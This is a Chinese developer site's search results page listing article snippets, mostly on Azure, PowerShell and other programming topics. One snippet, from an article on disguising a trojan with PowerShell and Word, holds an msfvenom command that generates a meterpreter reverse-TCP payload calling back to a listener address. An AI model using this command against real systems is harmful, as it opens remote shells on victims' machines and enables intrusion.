码迷,mamicode.com
首页 >  
搜索关键字:powershell dsc azure vm extension    ( 11621个结果
[Azure Devops] 使用 Azure Repos 管理代码
1. 什么是 Azure Repos Azure Repos 是一组版本控制工具,可用于管理代码。无论您的软件项目是大型项目还是小型项目,都应尽快使用版本控制。 版本控制系统是可帮助您跟踪随时间变化对代码所做的更改的软件。在编辑代码时,您告诉版本控制系统对文件进行快照。版本控制系统会永久保存该快照, ...
分类:其他好文   时间:2021-04-01 13:45:29    阅读次数:0
Azure Service Bus(2)
先去NuGet里安装Service Bus 组件 下面是应用,贼简单 var MethodCont = new JObject { new JProperty("vendorCode",EclpNum),//商家编码 new JProperty("waybillCode",TripNumber),/ ...
分类:其他好文   时间:2021-03-31 12:29:07    阅读次数:0
【Azure 云服务】在Cloud Service的代码中如何修改IIS Application Pool的配置呢? 比如IdleTimeout, startMode, Recycling.PeriodicRestart.Time等
在Cloud Service的代码中如何修改IIS Application Pool的配置呢? 比如IdleTimeout, startMode, Recycling.PeriodicRestart.Time等 ...
分类:移动开发   时间:2021-03-29 12:02:48    阅读次数:0
2021年的UWP(6)——长生命周期Desktop Extension向UWP的反向通知
上一篇我们讨论了UWP和Desktop Extension间的双向通讯,适用于Desktop Extension中存在用户交互的场景。本篇我们讨论最后一种情况,与前者不同的是,Desktop Extension和UWP保持相同的生命周期,同时规避AppServiceConnection可能被Wind ...
分类:其他好文   时间:2021-03-29 11:42:38    阅读次数:0
关于powershell 的一些基本使用
#获取当前目录下的所有.proto 的文件信息 ls *.proto -r | % versioninfo #将当前文件夹下的 proto 文件复制到c盘的proto 文件夹 Copy-Item .\*\*.proto C:\proto -Recurse ...
分类:系统相关   时间:2021-03-26 15:22:26    阅读次数:0
Powershell配合word伪装木马执行
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:系统相关   时间:2021-03-18 14:14:35    阅读次数:0
cmder配置
cmder介绍 简介 windows10中常用的命令行终端有cmd,powershell。其它需手动安装的终端有git bash(对于git命令),xshell(对于ssh连接远程主机附带linux命令) 集成多种终端,实现高效开发的命令行工具cmder,可以实现cmd,git,ssh,linux多 ...
分类:其他好文   时间:2021-03-18 14:03:40    阅读次数:0
springboot项目中,ehcache报错,需要CacheManager单例的解决办法
在新的springboot项目中,如果在mybatis中使用了ehcache后,再第二次使用ehcache,会提示错误 Another CacheManager with same name 'default' already exists in the same VM. Please provid ...
分类:编程语言   时间:2021-03-18 13:59:58    阅读次数:0
App Service overview Azure
App Service overview Azure App Service is an HTTP-based service for hosting web applications, REST APIs, and mobile back ends. You can develop in your ...
分类:移动开发   时间:2021-03-17 15:03:35    阅读次数:0
【Azure 服务总线】详解Azure Service Bus SDK中接收消息时设置的maxConcurrentCalls,prefetchCount参数
(Azure Service Bus服务总线的两大类消息处理方式: 队列Queue和主题Topic) 问题描述 使用Service Bus作为企业消息代理,当有大量的数据堆积再Queue或Topic中时,如何来优化接收端处理消息的能力呢? 详细解释 在接收端(Receover)的代码中,有两个属性与 ...
分类:其他好文   时间:2021-03-17 14:56:44    阅读次数:0
11621条   上一页 1 ... 9 10 11 12 13 ... 1163 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!